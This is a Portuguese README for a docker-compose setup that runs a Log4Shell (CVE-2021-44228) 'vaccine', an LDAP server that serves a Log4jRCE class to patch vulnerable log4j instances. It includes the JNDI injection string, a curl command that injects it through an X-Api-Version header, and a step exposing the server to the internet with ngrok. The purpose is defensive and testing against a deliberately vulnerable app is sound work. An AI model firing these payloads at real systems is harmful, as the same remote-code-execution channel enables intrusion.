
solução docker compose para executar um ambiente de vacinação para a vulnerabilidade log4j2 CVE-2021-44228
Uma forma containerizada de executar a vacina log4j oferecida pela Cyberreason
Clone este repositório:
git clone https://github.com/jeffbryner/log4j-docker-vaccine.git
Edite o arquivo containers.env para conter um IP/DNS privado ou público preciso que seu alvo possa acessar. A entrada padrão provavelmente não funcionará para você!
Construa e execute os containers:
docker-compose -f docker-compose.yml -p vaccine up
Agora você tem um servidor ldap em escuta que servirá a classe Log4jRCE para inocular uma instância vulnerável do log4j.
Você pode expor isso à internet (se desejar) usando o ngrok.
ngrok tcp 1389
Você pode enviar uma instância vulnerável do log4j para isso usando a infame string de entrada jndi:
${jndi:ldap://<ngrokurlgoeshere>:1389/a}
Há uma versão propositalmente vulnerável do log4j em um contêiner disponível em:
Você pode seguir as instruções deles para iniciá-lo e usá-lo para teste:
docker build . -t vulnerable-app
docker run -p 8080:8080 --name vulnerable-app vulnerable-app
E dispare a inoculação via:
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-ip-address-or-dns-name:1389/a'